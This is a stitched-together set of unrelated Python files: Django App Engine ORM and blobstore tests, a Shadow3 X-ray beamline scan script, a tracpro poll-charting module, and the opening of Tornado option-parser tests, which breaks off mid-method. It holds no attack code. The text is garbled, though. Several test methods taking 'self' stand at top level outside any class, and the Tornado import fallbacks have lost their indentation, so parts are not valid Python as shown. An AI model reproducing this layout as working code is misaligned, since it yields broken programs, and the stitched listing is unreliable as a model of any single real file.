    self.assertEqual(["B", "C", "D"], names(TestUser.objects.filter(id__in=middle).order_by('id')))
    self.assertEqual(["D", "C", "B"], names(TestUser.objects.filter(id__in=middle).order_by('-id')))
    self.assertEqual(
        ["A", "C", "E"],
        names(TestUser.objects.filter(id__in=[self.u1.id, self.u5.id, self.u3.id]).order_by('id')))
    self.assertEqual(
        ["E", "D", "C", "A"],
        names(TestUser.objects.filter(id__in=[self.u4.id, self.u5.id, self.u3.id, self.u1.id]).order_by('-id')))
def test_dates_query(self):
    """dates() truncates to year/month/day granularity and honours ordering."""
    z_user = TestUser.objects.create(username="Z", email="z@example.com")
    z_user.last_login = datetime.date(2013, 4, 5)
    z_user.save()
    last_a_login = TestUser.objects.get(username="A").last_login
    # Year granularity: one entry per distinct year, truncated to Jan 1st.
    dates = TestUser.objects.dates('last_login', 'year')
    self.assertItemsEqual(
        [datetime.date(2013, 1, 1), datetime.date(last_a_login.year, 1, 1)],
        dates
    )
    # Month granularity truncates to the 1st of the month.
    dates = TestUser.objects.dates('last_login', 'month')
    self.assertItemsEqual(
        [datetime.date(2013, 4, 1), datetime.date(last_a_login.year, last_a_login.month, 1)],
        dates
    )
    # Day granularity is ordered ascending by default...
    dates = TestUser.objects.dates('last_login', 'day')
    self.assertEqual(
        [datetime.date(2013, 4, 5), last_a_login],
        list(dates)
    )
    # ...and can be reversed explicitly.
    dates = TestUser.objects.dates('last_login', 'day', order='DESC')
    self.assertEqual(
        [last_a_login, datetime.date(2013, 4, 5)],
        list(dates)
    )
def test_in_query(self):
    """ Test that the __in filter works, and that it cannot be used with more than 30 values,
    unless it's used on the PK field.
    """
    # Basic __in on a normal field.
    self.assertItemsEqual(list(TestUser.objects.filter(username__in=['A', 'B'])), [self.u1, self.u2])
    # ...and on the primary key.
    self.assertItemsEqual(list(TestUser.objects.filter(pk__in=[self.u1.pk, self.u2.pk])), [self.u1, self.u2])
    # More than 30 values on a non-pk field is rejected.
    oversized = TestUser.objects.filter(username__in=list(letters[:31]))
    # This currently raises an error from App Engine, should we raise our own?
    self.assertRaises(Exception, list, oversized)
    # The 30-item limit does not apply to pk filters.
    list(TestUser.objects.filter(pk__in=list(xrange(1, 32))))
    # Chained pk__in filters intersect correctly.
    chained = TestUser.objects.filter(
        pk__in=[self.u1.pk, self.u2.pk, self.u3.pk]).filter(pk__in=[self.u1.pk, self.u2.pk])
    self.assertItemsEqual(list(chained), [self.u1, self.u2])
def test_self_relations(self):
    """Reverse lookup of a self-referential FK returns the referring objects."""
    parent = SelfRelatedModel.objects.create()
    child = SelfRelatedModel.objects.create(related=parent)
    self.assertEqual([child], list(parent.selfrelatedmodel_set.all()))
def test_special_indexes_for_empty_fields(self):
    """Saving with every special index registered must tolerate an empty field."""
    fruit = TestFruit.objects.create(name='pear')
    for lookup in ('icontains', 'contains', 'iexact', 'iendswith', 'endswith',
                   'istartswith', 'startswith'):
        add_special_index(TestFruit, 'color', lookup)
    fruit.save()
def test_special_indexes_for_unusually_long_values(self):
    """Special indexes must cope with values too long for normal indexing."""
    fruit = TestFruit.objects.create(
        name='pear', color='1234567890-=!@#$%^&*()_+qQWERwertyuiopasdfghjklzxcvbnm')
    for lookup in ('icontains', 'contains', 'iexact', 'iendswith', 'endswith',
                   'istartswith', 'startswith'):
        add_special_index(TestFruit, 'color', lookup)
    fruit.save()
    # (lookup, search term, expected match count)
    cases = [
        ('contains', '1234567890-=!@#$%^&*()_+qQWERwertyuiopasdfghjklzxcvbnm', 1),
        ('contains', '890-=!@#$', 1),
        ('contains', '1234567890-=!@#$%^&*()_+qQWERwertyui', 1),
        ('contains', '8901', 0),
        ('icontains', '1234567890-=!@#$%^&*()_+qQWERWERTYuiopasdfghjklzxcvbnm', 1),
        ('icontains', '890-=!@#$', 1),
        ('icontains', '1234567890-=!@#$%^&*()_+qQWERwertyuI', 1),
        ('icontains', '8901', 0),
    ]
    for lookup, term, expected in cases:
        matches = TestFruit.objects.filter(**{'color__' + lookup: term})
        self.assertEqual(len(list(matches)), expected)
class BlobstoreFileUploadHandlerTest(TestCase):
    """Exercises BlobstoreFileUploadHandler against a canned multipart upload.

    The payload mimics what App Engine rewrites an upload request into: the
    file part becomes a ``message/external-body`` reference to a blob key.
    """
    # Multipart boundary shared by the canned payload in _create_wsgi_input().
    boundary = "===============7417945581544019063=="

    def setUp(self):
        super(BlobstoreFileUploadHandlerTest, self).setUp()
        self.request = RequestFactory().get('/')
        self.request.META = {
            'wsgi.input': self._create_wsgi_input(),
            'content-type': 'message/external-body; blob-key="PLOF0qOie14jzHWJXEa9HA=="; access-type="X-AppEngine-BlobKey"'
        }
        self.uploader = BlobstoreFileUploadHandler(self.request)

    def _create_wsgi_input(self):
        # Canned request body; the blob key and field layout are what the
        # tests below assert against, so it must stay byte-for-byte.
        return StringIO('--===============7417945581544019063==\r\nContent-Type:'
                        ' text/plain\r\nContent-Disposition: form-data;'
                        ' name="field-nationality"\r\n\r\nAS\r\n'
                        '--===============7417945581544019063==\r\nContent-Type:'
                        ' message/external-body; blob-key="PLOF0qOie14jzHWJXEa9HA==";'
                        ' access-type="X-AppEngine-BlobKey"\r\nContent-Disposition:'
                        ' form-data; name="field-file";'
                        ' filename="Scan.tiff"\r\n\r\nContent-Type: image/tiff'
                        '\r\nContent-Length: 19837164\r\nContent-MD5:'
                        ' YjI1M2Q5NjM5YzdlMzUxYjMyMjA0ZTIxZjAyNzdiM2Q=\r\ncontent-disposition:'
                        ' form-data; name="field-file";'
                        ' filename="Scan.tiff"\r\nX-AppEngine-Upload-Creation: 2014-03-07'
                        ' 14:48:03.246607\r\n\r\n\r\n'
                        '--===============7417945581544019063==\r\nContent-Type:'
                        ' text/plain\r\nContent-Disposition: form-data;'
                        ' name="field-number"\r\n\r\n6\r\n'
                        '--===============7417945581544019063==\r\nContent-Type:'
                        ' text/plain\r\nContent-Disposition: form-data;'
                        ' name="field-salutation"\r\n\r\nmrs\r\n'
                        '--===============7417945581544019063==--')

    def test_non_existing_files_do_not_get_created(self):
        # Completing an upload whose blob entity doesn't exist must fail,
        # not silently create a file.
        file_field_name = 'field-file'
        length = len(self._create_wsgi_input().read())
        self.uploader.handle_raw_input(self.request.META['wsgi.input'], self.request.META, length, self.boundary, "utf-8")
        self.assertRaises(StopFutureHandlers, self.uploader.new_file, file_field_name, 'file_name', None, None)
        self.assertRaises(EntityNotFoundError, self.uploader.file_complete, None)

    def test_blob_key_creation(self):
        # The handler should extract a blob key while parsing the raw input.
        file_field_name = 'field-file'
        length = len(self._create_wsgi_input().read())
        self.uploader.handle_raw_input(self.request.META['wsgi.input'], self.request.META, length, self.boundary, "utf-8")
        self.assertRaises(
            StopFutureHandlers,
            self.uploader.new_file, file_field_name, 'file_name', None, None
        )
        self.assertIsNotNone(self.uploader.blobkey)

    def test_blobstore_upload_url_templatetag(self):
        # The templatetag should emit a dev-server blobstore upload URL.
        template = """{% load storage %}{% blobstore_upload_url '/something/' %}"""
        response = Template(template).render(Context({}))
        self.assertTrue(response.startswith("http://localhost:8080/_ah/upload/"))
class DatastorePaginatorTest(TestCase):
    """Checks DatastorePaginator page arithmetic against 15 fixture rows."""

    def setUp(self):
        super(DatastorePaginatorTest, self).setUp()
        for value in range(15):
            PaginatorModel.objects.create(foo=value)

    def test_basic_usage(self):
        def get_page(number):
            # A fresh queryset per page, as a real view would build one.
            queryset = PaginatorModel.objects.all().order_by('foo')
            return paginator.DatastorePaginator(queryset, 5).page(number)

        first = get_page(1)
        self.assertFalse(first.has_previous())
        self.assertTrue(first.has_next())
        self.assertEqual(first.start_index(), 1)
        self.assertEqual(first.end_index(), 5)
        self.assertEqual(first.next_page_number(), 2)
        self.assertEqual([item.foo for item in first], [0, 1, 2, 3, 4])

        middle = get_page(2)
        self.assertTrue(middle.has_previous())
        self.assertTrue(middle.has_next())
        self.assertEqual(middle.start_index(), 6)
        self.assertEqual(middle.end_index(), 10)
        self.assertEqual(middle.previous_page_number(), 1)
        self.assertEqual(middle.next_page_number(), 3)
        self.assertEqual([item.foo for item in middle], [5, 6, 7, 8, 9])

        last = get_page(3)
        self.assertTrue(last.has_previous())
        self.assertFalse(last.has_next())
        self.assertEqual(last.start_index(), 11)
        self.assertEqual(last.end_index(), 15)
        self.assertEqual(last.previous_page_number(), 2)
        self.assertEqual([item.foo for item in last], [10, 11, 12, 13, 14])

    def test_empty(self):
        """An empty queryset still yields a valid (zero-indexed) first page."""
        empty_page = paginator.DatastorePaginator(PaginatorModel.objects.none(), 5).page(1)
        self.assertFalse(empty_page.has_previous())
        self.assertFalse(empty_page.has_next())
        self.assertEqual(empty_page.start_index(), 0)
        self.assertEqual(empty_page.end_index(), 0)
        self.assertEqual([item for item in empty_page], [])
class TestSpecialIndexers(TestCase):
    """Verifies special (computed) index lookups against a pure-Python oracle.

    Each lookup is checked by comparing the queryset size with the result of
    the equivalent Python string operation over the fixture data.
    """

    def setUp(self):
        super(TestSpecialIndexers, self).setUp()
        # Mixed case, duplicates-modulo-case and punctuation on purpose.
        self.names = [
            'Ola', 'Adam', 'Luke', 'rob', 'Daniel', 'Ela', 'Olga', 'olek',
            'ola', 'Olaaa', 'OlaaA', 'Ola + Ola', '-Test-', '-test-'
        ]
        for name in self.names:
            SpecialIndexesModel.objects.create(name=name)
        # List-valued fixtures for the ListField/SetField regex lookups below.
        self.lists = [
            self.names,
            ['Name', 'name', 'name + name'],
            ['-Tesst-'],
            ['-test-']
        ]
        for sample_list in self.lists:
            SpecialIndexesModel.objects.create(sample_list=sample_list)
        self.qry = SpecialIndexesModel.objects.all()

    def test_iexact_lookup(self):
        """iexact matches case-insensitively."""
        for name in self.names:
            qry = self.qry.filter(name__iexact=name)
            self.assertEqual(len(qry), len([x for x in self.names if x.lower() == name.lower()]))

    def test_contains_lookup_and_icontains_lookup(self):
        """contains/icontains match substrings, case-sensitively/-insensitively."""
        tests = self.names + ['o', 'O', 'la']
        for name in tests:
            qry = self.qry.filter(name__contains=name)
            self.assertEqual(len(qry), len([x for x in self.names if name in x]))
            qry = self.qry.filter(name__icontains=name)
            self.assertEqual(len(qry), len([x for x in self.names if name.lower() in x.lower()]))

    def test_endswith_lookup_and_iendswith_lookup(self):
        """endswith/iendswith match suffixes."""
        tests = self.names + ['a', 'A', 'aa']
        for name in tests:
            qry = self.qry.filter(name__endswith=name)
            self.assertEqual(len(qry), len([x for x in self.names if x.endswith(name)]))
            qry = self.qry.filter(name__iendswith=name)
            self.assertEqual(len(qry), len([x for x in self.names if x.lower().endswith(name.lower())]))

    def test_startswith_lookup_and_istartswith_lookup(self):
        """startswith/istartswith match prefixes."""
        tests = self.names + ['O', 'o', 'ola']
        for name in tests:
            qry = self.qry.filter(name__startswith=name)
            self.assertEqual(len(qry), len([x for x in self.names if x.startswith(name)]))
            qry = self.qry.filter(name__istartswith=name)
            self.assertEqual(len(qry), len([x for x in self.names if x.lower().startswith(name.lower())]))

    def test_regex_lookup_and_iregex_lookup(self):
        """regex/iregex behave like re.search, also on list-valued fields."""
        tests = ['([A-Z])\w+', '([A-Z])\w+\s[+]\s([A-Z])\w+', '\-Test\-']
        for pattern in tests:
            qry = self.qry.filter(name__regex=pattern)
            self.assertEqual(len(qry), len([x for x in self.names if re.search(pattern, x)]))
            qry = self.qry.filter(name__iregex=pattern)
            self.assertEqual(len(qry), len([x for x in self.names if re.search(pattern, x, flags=re.I)]))
            # Check that the same works for ListField and SetField too
            # (a row matches when any of its list members matches).
            qry = self.qry.filter(sample_list__regex=pattern)
            expected = [sample_list for sample_list in self.lists if any([bool(re.search(pattern, x)) for x in sample_list])]
            self.assertEqual(len(qry), len(expected))
            qry = self.qry.filter(sample_list__iregex=pattern)
            expected = [sample_list for sample_list in self.lists if any([bool(re.search(pattern, x, flags=re.I)) for x in sample_list])]
            self.assertEqual(len(qry), len(expected))
def deferred_func():
    """No-op target used by TestHelperTests to exercise deferred.defer()."""
    pass
class TestHelperTests(TestCase):
    """Tests for the test helpers themselves (consistency and task queues)."""

    def test_inconsistent_db(self):
        """inconsistent_db() simulates datastore eventual consistency."""
        with inconsistent_db():
            fruit = TestFruit.objects.create(name="banana")
            # Global queries don't see the fresh write...
            self.assertEqual(0, TestFruit.objects.count()) # Inconsistent query
            # ...but a lookup by key is always consistent.
            self.assertEqual(1, TestFruit.objects.filter(pk=fruit.pk).count()) #Consistent query

    def test_processing_tasks(self):
        """process_task_queues() drains every queue, default and custom."""
        from google.appengine.api import apiproxy_stub_map
        stub = apiproxy_stub_map.apiproxy.GetStub("taskqueue")
        stub._queues[None]._ConstructQueue("another") # Add a test queue
        stub._queues[None]._queue_yaml_parser = None # Make it so that the taskqueue stub doesn't reload from YAML
        self.assertNumTasksEquals(0) #No tasks
        deferred.defer(deferred_func)
        self.assertNumTasksEquals(1, queue_name='default')
        deferred.defer(deferred_func, _queue='another')
        self.assertNumTasksEquals(1, queue_name='another')
        taskqueue.add(url='/')
        self.assertNumTasksEquals(2, queue_name='default')
        self.process_task_queues()
        self.assertNumTasksEquals(0) #No tasks
| |
#
#
# Shadow3 python script to scan a variable
#
#
# It uses the currently defined Shadow system (files start.00...start.03)
#
# It scans a list of variables, e.g., the distances T_SOURCE and T_IMAGE of
# the first and second o.e., respectively.
# It also sets the o.e.2 radius accordingly.
#
# Output: a file ex18b.spec
#
#
# Author: Manuel Sanchez del Rio
# ESRF (c) 2013-2015
#
# Modifications:
# srio@esrf.eu 20140108 Adapted for python3
#
#
# import block
#
import numpy
import Shadow
import copy
# Script configuration flags (0 disables per-iteration plots).
do_intermediate_plots = 0
horizontal_divergence_in_mrad = 5.0
#
# initialize shadow3 source (oe0) and beam
#
beam = Shadow.Beam()
oe0 = Shadow.Source()
oe1 = Shadow.OE()
oe2 = Shadow.OE()
# oe0: bending-magnet source, photon energy window 19970-20030 eV.
oe0.BENER = 6.03999996
oe0.EPSI_X = 3.89999997e-07
oe0.EPSI_Z = 3.89999988e-09
oe0.FDISTR = 4
oe0.FSOURCE_DEPTH = 4
oe0.F_COLOR = 3
oe0.F_PHOT = 0
# NOTE(review): these half-divergences (0.25 mrad each) are overridden
# to 5e-3/2 just before genSource() is called further down.
oe0.HDIV1 = 0.05*1e-3*horizontal_divergence_in_mrad
oe0.HDIV2 = 0.05*1e-3*horizontal_divergence_in_mrad
oe0.ISTAR1 = 567656675
oe0.NCOL = 0
oe0.NPOINT = 25000
oe0.N_COLOR = 0
oe0.PH1 = 19970.0
oe0.PH2 = 20030.0
oe0.POL_DEG = 0.0
oe0.R_ALADDIN = 2517.72003
oe0.R_MAGNET = 25.1772003
oe0.SIGDIX = 0.0
oe0.SIGDIZ = 0.0
oe0.SIGMAX = 0.0395000018
oe0.SIGMAY = 0.0
oe0.SIGMAZ = 0.00368999992
oe0.VDIV1 = 1.0
oe0.VDIV2 = 1.0
oe0.WXSOU = 0.0
oe0.WYSOU = 0.0
oe0.WZSOU = 0.0
# oe1: crystal element at 45 deg, centered at 20 keV; T_SOURCE is
# overwritten inside the scan loop.
oe1.FILE_REFL = b'si5_55.111'
oe1.F_CENTRAL = 1
oe1.F_CRYSTAL = 1
oe1.PHOT_CENT = 20000.0
oe1.R_LAMBDA = 5000.0
oe1.T_IMAGE = 0.0
oe1.T_INCIDENCE = 45.0
oe1.T_REFLECTION = 45.0
oe1.T_SOURCE = 3000.0
# oe2: cylindrical crystal; RMIRR and T_IMAGE are overwritten in the loop.
oe2.ALPHA = 180.0
oe2.CIL_ANG = 90.0
oe2.FCYL = 1
oe2.FILE_REFL = b'si5_55.111'
oe2.FMIRR = 1
oe2.F_CENTRAL = 1
oe2.F_CRYSTAL = 1
oe2.F_EXT = 1
oe2.PHOT_CENT = 20000.0
oe2.RMIRR = 148.298614
oe2.R_LAMBDA = 5000.0
oe2.T_IMAGE = 1000.0
oe2.T_INCIDENCE = 45.0
oe2.T_REFLECTION = 45.0
oe2.T_SOURCE = 0.0
#
# >>>>>>>>>>> inputs <<<<<<<<<<<<<
#
#
# flags
#
write = 0 # 0=No 1=Yes (write shadow binary files)
#
# scanning magnification M:
#
npts = 51
scan = numpy.linspace(0.1,1.0,npts) # from, to, npoints
#
# >>>>>>>>>>> calculations <<<<<<<<<<<<<
#
#
# define array to store results
#
nout = 8 # number of variables to store
out = numpy.zeros( (nout,scan.size) ) # creates the array to store results
#
# open output file (binary mode: every write below is utf-8 encoded)
#
f = open('ex18b.spec', 'wb')
header="#F ex18b.py\n"
f.write( header.encode('utf-8') )
#
# run source with horizontal divergence: HDIV1+HDIV2
#
oe0.HDIV1 = 5e-3/2
oe0.HDIV2 = 5e-3/2
beam.genSource(oe0)
if write:
    beam.write("begin.dat")
#
# start loop on scanned variable
#
for i in range(scan.size):
    print("\n>>>>>>>>>> tracing item %d of %d. \n"%(i+1,scan.size))
    # Work on copies so oe1/oe2 keep their pristine settings between passes.
    oe1i = oe1.duplicate()
    oe2i = oe2.duplicate()
    pp = 3000.0
    qq = pp*scan[i]          # image distance = p * magnification
    # Sagittal radius for p/q focusing at the given grazing angle.
    theta = (90.0e0 - 84.32614)*numpy.pi/180e0
    rsag=2.0e0*numpy.sin(theta)/(1.0e0/pp+1.0e0/qq)
    oe1i.T_SOURCE = pp
    oe2i.T_IMAGE = qq
    oe2i.RMIRR = rsag
    if write:
        oe1i.FWRITE=0 # write(0) or not(3) binary files
        oe2i.FWRITE=0 # write(0) or not(3) binary files
        oe1i.write("start.01")
        oe2i.write("start.02")
    else:
        oe1i.FWRITE=3 # write(0) or not(3) binary files
        oe2i.FWRITE=3 # write(0) or not(3) binary files
    # Re-trace a fresh copy of the stored source through both elements.
    beami = None
    beami = beam.duplicate()
    # run trace
    beami.traceOE(oe1i,1)
    beami.traceOE(oe2i,2)
    if write:
        oe1i.write("end.01")
        oe2i.write("end.02")
    # score results: 2D histogram for spot size, 1D for energy spread
    g1 = beami.histo2(1,3,nolost=1,nbins=100)
    g2 = beami.histo1(11,nolost=1,nbins=31,ref=23)
    #plots
    if do_intermediate_plots:
        Shadow.ShadowTools.plotxy(beami,1,3,nolost=1,nbins=100)
    # store scored results
    out[0,i] = scan[i]
    out[1,i] = pp
    out[2,i] = qq
    out[3,i] = rsag
    #if g1 != None:
    #    fw1 = numpy.array([g1.fwhmx,g1.fwhmy])
    out[4,i] = g1['fwhm_h']*1e4 # in um
    out[5,i] = g1['fwhm_v']*1e4
    #
    # if g2 != None:
    out[6,i] = g2['fwhm']
    out[7,i] = beami.intensity(nolost=1)
# Column labels for the SPEC scan block written below.
labels="#L Magnification p [cm] q [cm] Rsag [cm] "+ \
    "fwhm_h [um] fwhm_v [um] DE [eV] Intensity [a.u.]"
#
# >>>>>>>>>>>> outputs <<<<<<<<<<<<<<<<
#
# Write the SPEC-formatted scan: header, then one row per scan point.
# (Removed a dead 'tmp' computation here: it stringified a range() object,
# which is broken on python3, and its result was never used.)
header="\n#S 1 Magnification\n#N "+ \
    str(out.shape[0])+"\n"+labels+"\n"
f.write(header.encode('utf-8') )
row_format = "%20.11e "*out.shape[0] + "\n"   # hoisted loop invariant
for i in range(out.shape[1]):
    row = row_format % tuple(out[:,i].tolist())
    f.write(row.encode('utf-8'))
    print(row)
f.close()
print ("File written to disk: ex18b.spec")
#
# plot intensity vs magnification with matplotlib
#
from matplotlib import pylab as plt
plt.plot(out[0,:],out[7,:])
plt.xlabel('Magnification factor')
plt.ylabel('Intensity')
plt.show()
| |
from __future__ import absolute_import, unicode_literals
from django.core.urlresolvers import reverse
from django.db.models.functions import Lower
from django.utils.http import urlencode
from tracpro.charts.formatters import format_series, format_x_axis
from tracpro.groups.models import Region
from .models import Answer, Question
from . import utils
def _url(name, args=None, kwargs=None, params=None):
    """Reverse *name* and append *params* as a querystring when given."""
    resolved = reverse(name, args=args, kwargs=kwargs)
    if not params:
        return resolved
    return '{}?{}'.format(resolved, urlencode(params))
def single_pollrun(pollrun, responses, question):
    """Chart the data for one question from a single pollrun.
    Assumes responses are already filtered for the desired pollrun/date,
    and includes all valid answers for the given question and responses.
    Will be a word cloud for open-ended questions, a bar chart with autocreated
    categories for numeric questions, and a bar chart of categories for everything else.
    Returns a tuple (chart_type, chart_data, summary_table), where:
    chart_type = None|'open-ended'|'bar'
    chart_data = {'categories': list of category names, 'data': list of counts} for all but open-ended,
        or list of {'text': 'xxx', 'weight': NNN} dictionaries for open-ended}
        or empty list if there were no answers.
    summary_table = if numeric:
        [('Mean', value), ('Standard deviation', value), ('Response rate average (%)', value)]
        else (no answers or non-numeric) None.
    """
    # Defaults returned when there are no answers at all.
    chart_type = None
    chart_data = []
    summary_table = None
    answers = Answer.objects.filter(response__in=responses, question=question)
    if answers:
        if question.question_type == Question.TYPE_OPEN:
            chart_type = 'open-ended'
            chart_data = word_cloud_data(answers)
        else:
            chart_type = 'bar'
            if question.question_type == Question.TYPE_NUMERIC:
                chart_data = single_pollrun_auto_categorize(answers)
                # Per the contract above, only numeric questions get a
                # statistics summary for this pollrun.
                _, answer_avgs, answer_stdevs, response_rates = utils.summarize_by_pollrun(
                    answers, responses)
                summary_table = [
                    ('Mean', answer_avgs.get(pollrun.pk, 0)),
                    ('Standard deviation', answer_stdevs.get(pollrun.pk, 0)),
                    ('Response rate average (%)', response_rates.get(pollrun.pk, 0)),
                ]
            else:
                chart_data = single_pollrun_multiple_choice(answers, pollrun)
    return chart_type, chart_data, summary_table
def single_pollrun_auto_categorize(answers):
    """Bucket answers into auto-generated categories (Answer queryset helper)."""
    return answers.autocategorize()
def single_pollrun_multiple_choice(answers, pollrun):
    """Return bar-chart data: per-category answer counts for *pollrun*.

    Categories with no answers for this pollrun are reported as 0 so the
    'categories' and 'data' lists stay aligned.
    """
    counts = list(answers.category_counts_by_pollrun())
    return {
        'categories': [category for category, _ in counts],
        'data': [per_pollrun.get(pollrun.pk, 0) for _, per_pollrun in counts],
    }
def multiple_pollruns(pollruns, responses, question, split_regions, contact_filters):
    """Dispatch to the chart builder matching the question type.

    Returns (chart_type, chart_data, summary_table); all three are None when
    there are no answers for the question/responses.
    """
    chart_type = None
    chart_data = None
    summary_table = None
    pollruns = pollruns.order_by('conducted_on')
    answers = (
        Answer.objects
        .filter(response__in=responses, question=question)
        .select_related('question__poll__org', 'response__contact'))
    # Save a bit of time with .exists();
    # queryset is re-evaluated later as a values set.
    if answers.exists():
        question_type = question.question_type
        if question_type == Question.TYPE_NUMERIC:
            chart_type = 'numeric'
            builder = (multiple_pollruns_numeric_split if split_regions
                       else multiple_pollruns_numeric)
            chart_data, summary_table = builder(
                pollruns, answers, responses, question, contact_filters)
        elif question_type == Question.TYPE_OPEN:
            chart_type = 'open-ended'
            chart_data = word_cloud_data(answers)
        elif question_type == Question.TYPE_MULTIPLE_CHOICE:
            chart_type = 'multiple-choice'
            chart_data, summary_table = multiple_pollruns_multiple_choice(
                pollruns, answers, responses, contact_filters)
    return chart_type, chart_data, summary_table
def word_cloud_data(answers):
    """Chart data for multiple pollruns of a poll."""
    cloud = []
    for word, count in answers.word_counts():
        cloud.append({'text': word, 'weight': count})
    return cloud
def multiple_pollruns_multiple_choice(pollruns, answers, responses, contact_filters):
    """Build one time series per answer category plus a summary table."""
    series = [
        format_series(pollruns, pollrun_counts, 'id@polls.pollrun_read',
                      params=contact_filters, name=category)
        for category, pollrun_counts in answers.category_counts_by_pollrun()
    ]
    chart_data = {
        'dates': format_x_axis(pollruns),
        'series': series,
    }
    (answer_sums,
     answer_avgs,
     answer_stdevs,
     response_rates) = utils.summarize_by_pollrun(answers, responses)
    summary_table = [
        ('Mean', utils.overall_mean(pollruns, answer_avgs)),
        ('Standard deviation', utils.overall_stdev(pollruns, answer_avgs)),
        ('Response rate average (%)', utils.overall_mean(pollruns, response_rates)),
    ]
    return chart_data, summary_table
def multiple_pollruns_numeric(pollruns, answers, responses, question, contact_filters):
    """Build sum/average/response-rate series for one question across pollruns."""
    (answer_sums,
     answer_avgs,
     answer_stdevs,
     response_rates) = utils.summarize_by_pollrun(answers, responses)
    # One pass over the pollruns builds every per-run list in lockstep.
    sums, averages, rates = [], [], []
    read_urls, join_urls = [], []
    for run in pollruns:
        sums.append(answer_sums.get(run.pk, 0))
        averages.append(answer_avgs.get(run.pk, 0))
        rates.append(response_rates.get(run.pk, 0))
        read_urls.append(
            _url('polls.pollrun_read', [run.pk], params=contact_filters))
        join_urls.append(
            _url('polls.pollrun_participation', [run.pk], params=contact_filters))
    chart_data = {
        'dates': format_x_axis(pollruns),
        'sum': [{'name': question.name, 'data': sums}],
        'average': [{'name': question.name, 'data': averages}],
        'response-rate': [{'name': question.name, 'data': rates}],
        'pollrun-urls': read_urls,
        'participation-urls': join_urls,
    }
    summary_table = [
        ('Mean', utils.overall_mean(pollruns, answer_avgs)),
        ('Standard deviation', utils.overall_stdev(pollruns, answer_avgs)),
        ('Response rate average (%)', utils.overall_mean(pollruns, response_rates)),
    ]
    return chart_data, summary_table
def multiple_pollruns_numeric_split(pollruns, answers, responses, question, contact_filters):
    """Return separate series for each contact region."""
    data = utils.summarize_by_region_and_pollrun(answers, responses)
    sum_data = []
    avg_data = []
    rate_data = []
    # Order regions case-insensitively by name for a stable series order.
    regions = (Region.objects.filter(pk__in=data.keys()).order_by(Lower('name')))
    for region in regions:
        answer_sums, answer_avgs, answer_stdevs, response_rates = data.get(region.pk)
        region_answer_sums = []
        region_answer_avgs = []
        region_response_rates = []
        # One data point per pollrun, zero-filled where the region has no answers.
        for pollrun in pollruns:
            region_answer_sums.append(answer_sums.get(pollrun.pk, 0))
            region_answer_avgs.append(answer_avgs.get(pollrun.pk, 0))
            region_response_rates.append(response_rates.get(pollrun.pk, 0))
        sum_data.append({'name': region.name, 'data': region_answer_sums})
        avg_data.append({'name': region.name, 'data': region_answer_avgs})
        rate_data.append({'name': region.name, 'data': region_response_rates})
    pollrun_urls = [
        _url('polls.pollrun_read', [p.pk], params=contact_filters)
        for p in pollruns]
    participation_urls = [
        _url('polls.pollrun_participation', [p.pk], params=contact_filters)
        for p in pollruns]
    chart_data = {
        'dates': format_x_axis(pollruns),
        'sum': sum_data,
        'average': avg_data,
        'response-rate': rate_data,
        'pollrun-urls': pollrun_urls,
        'participation-urls': participation_urls,
    }
    # The summary table aggregates across ALL regions, not per region.
    (pollrun_answer_sums,
     pollrun_answer_avgs,
     pollrun_answer_stdevs,
     pollrun_response_rates) = utils.summarize_by_pollrun(answers, responses)
    summary_table = [
        ('Mean', utils.overall_mean(pollruns, pollrun_answer_avgs)),
        ('Standard deviation', utils.overall_stdev(pollruns, pollrun_answer_avgs)),
        ('Response rate average (%)', utils.overall_mean(pollruns, pollrun_response_rates)),
    ]
    return chart_data, summary_table
| |
from __future__ import absolute_import, division, print_function, with_statement
import datetime
import os
import sys
from tornado.options import OptionParser, Error
from tornado.util import basestring_type
from tornado.test.util import unittest
try:
from cStringIO import StringIO # python 2
except ImportError:
from io import StringIO # python 3
try:
from unittest import mock # python 3.3
except ImportError:
try:
import mock # third-party mock package
except ImportError:
mock = None
class OptionsTest(unittest.TestCase):
def test_parse_command_line(self):
    """Command-line flags override defined defaults."""
    parser = OptionParser()
    parser.define("port", default=80)
    parser.parse_command_line(["main.py", "--port=443"])
    self.assertEqual(parser.port, 443)
def test_parse_config_file(self):
    """Option values can be loaded from a Python config file on disk."""
    options = OptionParser()
    options.define("port", default=80)
    options.parse_config_file(os.path.join(os.path.dirname(__file__),
                                           "options_test.cfg"))
    # assertEquals is a deprecated alias; use assertEqual.
    self.assertEqual(options.port, 443)
def test_parse_callbacks(self):
    """Parse callbacks fire only on final parses, and may fire repeatedly."""
    options = OptionParser()
    self.called = False
    def callback():
        self.called = True
    options.add_parse_callback(callback)
    # non-final parse doesn't run callbacks
    options.parse_command_line(["main.py"], final=False)
    self.assertFalse(self.called)
    # final parse does
    options.parse_command_line(["main.py"])
    self.assertTrue(self.called)
    # callbacks can be run more than once on the same options
    # object if there are multiple final parses
    self.called = False
    options.parse_command_line(["main.py"])
    self.assertTrue(self.called)
def test_help(self):
    """--help prints usage to stderr and exits via SystemExit."""
    options = OptionParser()
    try:
        orig_stderr = sys.stderr
        sys.stderr = StringIO()  # capture the usage text
        with self.assertRaises(SystemExit):
            options.parse_command_line(["main.py", "--help"])
        usage = sys.stderr.getvalue()
    finally:
        sys.stderr = orig_stderr  # always restore stderr
    self.assertIn("Usage:", usage)
def test_subcommand(self):
    """Leftover arguments can be fed to a second, independent parser."""
    base_options = OptionParser()
    base_options.define("verbose", default=False)
    sub_options = OptionParser()
    sub_options.define("foo", type=str)
    # Parsing stops at the first positional argument; the remainder is
    # returned for the subcommand parser.
    rest = base_options.parse_command_line(
        ["main.py", "--verbose", "subcommand", "--foo=bar"])
    self.assertEqual(rest, ["subcommand", "--foo=bar"])
    self.assertTrue(base_options.verbose)
    rest2 = sub_options.parse_command_line(rest)
    self.assertEqual(rest2, [])
    self.assertEqual(sub_options.foo, "bar")
    # the two option sets are distinct
    try:
        orig_stderr = sys.stderr
        sys.stderr = StringIO()  # swallow the error report
        with self.assertRaises(Error):
            sub_options.parse_command_line(["subcommand", "--verbose"])
    finally:
        sys.stderr = orig_stderr
def test_setattr(self):
    """Options can be assigned directly as attributes."""
    parser = OptionParser()
    parser.define('foo', default=1, type=int)
    parser.foo = 2
    self.assertEqual(parser.foo, 2)
def test_setattr_type_check(self):
    # setattr requires that options be the right type and doesn't
    # parse from string formats.
    parser = OptionParser()
    parser.define('foo', default=1, type=int)
    with self.assertRaises(Error):
        parser.foo = '2'
def test_setattr_with_callback(self):
    """Assigning an option value fires its registered callback."""
    seen = []
    parser = OptionParser()
    parser.define('foo', default=1, type=int, callback=seen.append)
    parser.foo = 2
    self.assertEqual(seen, [2])
def _sample_options(self):
    """Build a parser with two simple options for the container-protocol tests."""
    options = OptionParser()
